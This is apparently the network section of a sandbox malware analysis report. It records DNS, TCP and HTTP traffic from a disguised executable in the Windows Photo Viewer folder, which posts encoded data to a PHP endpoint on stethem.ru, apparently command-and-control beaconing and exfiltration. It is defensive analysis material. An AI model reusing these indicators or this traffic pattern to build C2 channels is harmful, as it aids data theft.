Dec 28, 2024 22:20:09.642384052 CET	49945	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:09.642987013 CET	49947	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:09.720176935 CET	80	49945	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:09.720293999 CET	49945	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:09.761853933 CET	49940	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:09.762217999 CET	80	49945	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:09.762280941 CET	49945	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:09.762386084 CET	80	49947	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:09.762532949 CET	49947	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:09.762558937 CET	49947	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:09.768804073 CET	49948	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:09.882044077 CET	80	49947	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:09.888336897 CET	80	49948	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:09.888571024 CET	49948	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:09.888799906 CET	49948	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:10.008382082 CET	80	49948	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:10.120929003 CET	49947	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:10.240643024 CET	80	49947	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:10.240740061 CET	80	49947	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:10.274597883 CET	49948	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:10.394212961 CET	80	49948	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:10.846952915 CET	80	49947	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:10.891328096 CET	49947	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:11.019191027 CET	80	49948	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:11.063183069 CET	49948	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:11.104232073 CET	80	49947	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:11.156929970 CET	49947	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:11.505955935 CET	80	49948	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:11.506164074 CET	80	49947	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:11.506282091 CET	49947	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:11.547575951 CET	49948	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:11.660079002 CET	80	49948	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:11.660309076 CET	49948	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:11.715490103 CET	49947	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:11.715547085 CET	49948	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:11.716509104 CET	49954	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:11.835588932 CET	80	49947	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:11.836040974 CET	80	49948	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:11.836133957 CET	49947	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:11.836143970 CET	49948	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:11.836172104 CET	80	49954	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:11.836263895 CET	49954	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:11.836410046 CET	49954	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:11.955939054 CET	80	49954	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:12.188834906 CET	49954	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:12.308501005 CET	80	49954	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:13.014018059 CET	80	49954	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:13.063230038 CET	49954	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:13.266460896 CET	80	49954	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:13.313205957 CET	49954	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:13.395915031 CET	49954	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:13.396667957 CET	49960	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:13.516336918 CET	80	49960	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:13.516462088 CET	49960	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:13.516830921 CET	80	49954	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:13.516922951 CET	49954	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:13.531372070 CET	49960	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:13.650886059 CET	80	49960	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:14.646677971 CET	80	49960	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:14.688209057 CET	49960	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:20.792978048 CET	49960	80	192.168.2.4	172.67.132.55
Dec 28, 2024 22:20:20.912535906 CET	80	49960	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:21.351150990 CET	80	49960	172.67.132.55	192.168.2.4
Dec 28, 2024 22:20:21.406956911 CET	49960	80	192.168.2.4	172.67.132.55

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 22:18:27.099186897 CET	60919	53	192.168.2.4	1.1.1.1
Dec 28, 2024 22:18:27.669706106 CET	53	60919	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 22:18:27.099186897 CET	192.168.2.4	1.1.1.1	0xa71f	Standard query (0)	stethem.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 22:18:27.669706106 CET	1.1.1.1	192.168.2.4	0xa71f	No error (0)	stethem.ru		172.67.132.55	A (IP address)	IN (0x0001)	false
Dec 28, 2024 22:18:27.669706106 CET	1.1.1.1	192.168.2.4	0xa71f	No error (0)	stethem.ru		104.21.12.183	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

stethem.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:27.795274019 CET	322	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:18:28.142039061 CET	344	OUT	Data Raw: 00 07 04 07 06 0c 01 0b 05 06 02 01 02 0d 01 00 00 02 05 0f 02 06 03 0e 02 52 0c 01 05 0f 01 50 0d 06 03 01 01 01 04 55 0c 51 07 0a 07 56 07 00 03 00 0b 0b 0d 53 05 07 07 57 07 03 07 52 05 0d 00 0b 0f 0b 06 01 01 03 0c 57 0d 57 0d 04 0f 51 05 54 Data Ascii: RPUQVSWRWWQTPYRV\L~kYe_crP\v[xk\|WMv\|`Ok]^DylUElNvI}ptdc_}O~V@xCr}\i
Dec 28, 2024 22:18:28.948762894 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:29.206145048 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2BgppLgDZx7frSwgA8pojERr%2BRAw%2FTqpt1FItyG0%2Fh8kUNIRi%2FLCMOu4QgFvnBvTEz7IfiRKfh4%2BBodbnnylDt6apQFBm%2BwzF%2BSyFxJnlFjhCsA1IJOjKDEdAk7d"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f949545e8f97279-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4228&min_rtt=2032&rtt_var=5155&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=666&delivery_rate=74463&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 34 38 0d 0a 56 4a 7e 06 78 54 63 4a 7b 04 74 46 7f 72 64 59 6a 5e 6f 4f 7c 5e 53 0c 6e 70 6c 05 69 4c 64 00 63 63 61 4f 79 61 54 59 61 65 77 5e 7d 5b 78 01 55 4b 72 54 63 61 6b 06 6b 04 75 4d 68 77 79 51 6f 58 73 55 7e 5a 74 59 75 62 61 03 60 4f 61 49 7c 71 54 05 69 42 78 0b 7e 67 60 58 76 4c 7b 06 7c 5c 7d 4a 7e 5e 6d 49 7b 49 7f 5d 79 64 68 04 7b 43 68 5c 7a 4c 60 02 6c 5d 61 5f 7f 5e 5d 5e 79 64 6c 4a 7e 5b 7b 4e 76 07 6c 01 7a 51 41 5b 6b 01 7c 0c 7c 71 58 50 77 7c 70 02 7b 42 52 46 60 63 65 52 6d 5f 5f 48 6a 6c 69 5d 6f 58 69 5a 61 5a 7b 06 61 4f 7c 04 74 62 6e 50 7e 5d 7a 06 77 5c 6d 04 76 65 68 09 7e 7c 65 05 77 7c 70 04 7f 05 7c 03 78 6f 67 03 6c 06 76 03 7c 6e 70 08 74 59 6c 04 69 62 76 09 7e 7d 77 08 78 6d 5c 4c 6a 62 71 05 7b 5d 46 51 6b 0a 63 53 7e 70 6b 51 7c 67 7d 59 6c 6d 7f 49 6c 71 7b 5c 7f 5f 56 5f 7e 59 77 42 6b 60 6a 55 6d 5a 70 4c 7d 5c 5e 00 74 4d 7d 51 7b 5c 79 01 76 48 60 4a 7c 76 56 06 7d 66 53 40 74 4c 67 07 7d 72 65 42 7f 49 72 09 7b 66 6c 4f 7d 73 7b 01 76 5c 69 4e 77 [TRUNCATED] Data Ascii: 548VJ~xTcJ{tFrdYj^oO\|^SnpliLdccaOyaTYaew^}[xUKrTcakkuMhwyQoXsU~ZtYuba`OaI\|qTiBx~g`XvL{\|\}J~^mI{I]ydh{Ch\zL`l]a_^]^ydlJ~[{NvlzQA[k\|\|qXPw\|p{BRF`ceRm__Hjli]oXiZaZ{aO\|tbnP~]zw\mveh~\|ew\|p\|xoglv\|nptYlibv~}wxm\Ljbq{]FQkcS~pkQ\|g}YlmIlq{\_V_~YwBk`jUmZpL}\^tM}Q{\yvH`J\|vV}fS@tLg}reBIr{flO}s{v\iNwO}G\|qr}B\|~gQJuakIzb_~pyIygxxYlx}wy\Rxcf\|^Z{gV~\s@v_dI~BQKYt}aavlx{lxIwNnCzaqI}\|jLxOjuc]Jwa`var
Dec 28, 2024 22:18:29.206253052 CET	915	IN	Data Raw: 7e 60 7a 05 74 72 71 06 75 5b 60 0c 7c 52 53 06 74 52 68 42 7e 63 5a 44 78 6c 67 02 7b 4e 54 49 7c 53 5a 09 77 67 74 4f 7e 62 72 41 7d 7d 7b 0b 7b 43 50 4f 7d 72 7d 07 7c 60 7c 42 7f 6c 5e 0c 7d 60 70 08 7d 59 54 4d 78 6d 67 01 78 5c 78 4b 7e 71 Data Ascii: ~`ztrqu[`\|RStRhB~cZDxlg{NTI\|SZwgtO~brA}}{{CPO}r}\|`\|Bl^}`p}YTMxmgx\xK~qUD}w]~`SB{c^}\lws}By_ivv`H~vR}H_w\Y\|b[wjNxft@~MsuLyva_Ov~Bl@gwu_YxryG\|pm{gtCxwR{mgyL`x]f{]NZoItKja\|[bX\|Gi\|dX\|I]QkOauRZNxlhI``eRzab\}b_z\y
Dec 28, 2024 22:18:29.426733971 CET	298	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 384 Expect: 100-continue
Dec 28, 2024 22:18:29.780517101 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:29.780740023 CET	384	OUT	Data Raw: 5f 5f 58 53 5b 43 51 51 5c 57 57 56 5a 5a 54 52 55 51 59 58 55 51 57 5a 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: __XS[CQQ\WWVZZTRUQYXUQWZZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9](==5Y&,&44 )/#'-(S5%%6>$;5,<![",\-
Dec 28, 2024 22:18:30.251072884 CET	941	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d1rfoeYOL1oQ93iNBzmjFofx0dO9uNoUUkK7QqTv7fpzCvS5SkKgjDO8I6FGS2v%2FvFmfWGe5QuvLrE5zqyFn1pGmS6phQRm4hmgODq70NoDdfsOajmfMOGGQ1G3U"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94954b0e5e7279-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7285&min_rtt=1947&rtt_var=9976&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2201&recv_bytes=1348&delivery_rate=2159763&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 21 0c 23 26 32 1c 35 20 36 0c 33 07 21 09 3c 34 3b 5b 2b 30 32 00 27 29 38 54 28 23 0e 54 24 29 26 12 33 2e 2e 51 30 3c 26 5f 25 39 28 51 06 12 22 18 21 3f 38 0f 2d 3a 27 1a 24 0e 2a 0b 21 03 35 13 24 5f 31 53 25 06 3d 59 21 39 3f 1b 2f 04 3a 0c 29 3a 37 1e 2b 1f 00 59 20 01 2e 57 02 13 27 1a 28 3e 27 54 36 31 34 05 27 01 23 59 21 01 3e 0b 27 39 0f 0e 23 5b 3b 5e 3d 3c 3c 15 22 24 38 0f 3e 17 37 58 37 16 05 08 28 29 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98!#&25 63!<4;[+02')8T(#T$)&3..Q0<&_%9(Q"!?8-:'$*!5$_1S%=Y!9?/:):7+Y .W'(>'T614'#Y!>'9#[;^=<<"$8>7X7()"U-.V5VT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:30.585714102 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1788 Expect: 100-continue
Dec 28, 2024 22:18:30.965277910 CET	1788	OUT	Data Raw: 5f 5b 58 57 5e 44 51 51 5c 57 57 56 5a 54 54 50 55 50 59 5a 55 5d 57 53 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _[XW^DQQ\WWVZTTPUPYZU]WSZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9]+0(^("1<^0'4#9\,:'&-,Q"3!&5',,![",\-
Dec 28, 2024 22:18:31.762059927 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:32.014098883 CET	941	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4A7AEnVdqF9Yq9PDnvlws4bTom5Zi6D00JrSjyFe6kVHopQH%2FmfFqCP6Xpn6tcJnRIgmLm%2BGjmrLtKvxtji4xV27mH4RWNYsZWsO45BGa%2FU5J5JlAVWwQjr0QuIY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9495577a801a1b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3984&min_rtt=1864&rtt_var=4939&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2087&delivery_rate=77552&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 22 12 23 43 29 0c 21 30 2e 0d 33 3a 32 53 2b 37 3f 59 3f 09 29 5a 30 00 34 54 2a 20 23 0d 27 00 36 5b 27 2e 32 1d 24 3c 21 03 26 03 28 51 06 12 22 1c 36 59 3c 0c 3a 14 27 15 24 56 2a 41 21 2d 1b 5c 27 39 21 16 26 01 3e 04 23 3a 23 18 38 39 35 54 29 3a 28 41 2a 22 32 5a 20 3b 2e 57 02 13 27 56 28 10 0d 50 21 21 3f 59 24 28 09 14 20 2f 0f 1b 26 29 21 0b 23 03 37 5f 29 2f 24 16 23 34 2f 54 29 29 3f 5b 20 16 2c 1c 3c 03 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98"#C)!0.3:2S+7?Y?)Z04T* #'6['.2$<!&(Q"6Y<:'$VA!-\'9!&>#:#895T):(A"2Z ;.W'V(P!!?Y$( /&)!#7_)/$#4/T))?[ ,<"U-.V5VT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:30.595922947 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:18:30.965641022 CET	1072	OUT	Data Raw: 5f 58 5d 50 5b 42 54 50 5c 57 57 56 5a 5e 54 56 55 50 59 5a 55 50 57 5c 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _X]P[BTP\WWVZ^TVUPYZUPW\ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9Y=3((>%1<0'3]#),['[<!#2&&&E%81],![",\-.
Dec 28, 2024 22:18:31.680439949 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:31.922749043 CET	799	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HbcYkw6TR7nDcWoguDUmmTbu0QHB18dux4UPH8xX6evnAGAzS6fPS6mMgaRG9cYgpz6%2FOQSawp0%2FXqYDYWVrVkEpnh%2Fx4q%2Fc4DdZzLX15C0zWPEH9%2BavSF%2BFDwr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9495570a0342e1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7135&min_rtt=1722&rtt_var=11473&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=32422&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:32.189368963 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:18:32.547472000 CET	1072	OUT	Data Raw: 5f 5e 58 55 5e 47 51 50 5c 57 57 56 5a 5f 54 50 55 5b 59 5e 55 54 57 59 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _^XU^GQP\WWVZ_TPU[Y^UTWYZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9]+#??X%]%,4'$/79<,9(Z$,S5!%5:E';%X-<![",\-*
Dec 28, 2024 22:18:33.365859985 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:18:33.618155003 CET	792	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:18:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KXUQjc3NpYXtk%2F2FGPBahp6vv5%2FG9ZTL2HiF%2BXgsydwlYwcJnQGcdbPiFPh2gT05aVoJWw3UczTtyyTSBSRvm4WR9wzqnqfkoSO2W4Lkh4sbTF5f2RiCb1NBfEAQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94956188c94370-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4449&min_rtt=1568&rtt_var=6351&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=59294&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49742	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:33.947928905 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:18:34.425534010 CET	1072	OUT	Data Raw: 5a 52 58 51 5b 47 51 50 5c 57 57 56 5a 5f 54 56 55 55 59 58 55 57 57 5f 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZRXQ[GQP\WWVZ_TVUUYXUWW_ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9)U<?=:2? _&4 797Y,9<$-35:Y2:B$"/<![",\-*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:18:35.001597881 CET	325	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 180740 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:18:35.360002995 CET	12360	OUT	Data Raw: 5a 5a 5d 53 5e 44 54 54 5c 57 57 56 5a 58 54 55 55 55 59 50 55 55 57 52 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZZ]S^DTT\WWVZXTUUUYPUUWRZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:)(.>1''$?#9'^,0[&-8506_2:%(5/<![",\-6
Dec 28, 2024 22:18:35.479629040 CET	2472	OUT	Data Raw: 3e 06 36 03 3b 39 24 36 37 39 3a 35 33 17 23 28 28 54 29 29 0b 2d 13 29 04 3e 09 52 04 2f 5a 1d 3c 2d 3b 13 30 5f 2c 5d 3a 2e 26 15 24 3b 0f 0c 21 5a 3c 5f 32 12 33 5d 3b 2b 02 06 35 5d 02 06 20 01 2f 31 05 10 21 0b 2a 54 14 37 24 28 2c 39 3e 29 Data Ascii: >6;9$679:53#((T))-)>R/Z<-;0_,]:.&$;!Z<_23];+5] /1!T7$(,9>)=<)0?-'&'0<5']5!%38#%1#=?.<7?$B,-#)=<Y6 6_@86!9#+9]=5311!0+^/)=_)P;<1189P< /4%07\=(213W'_;,5<%%?ZW7^
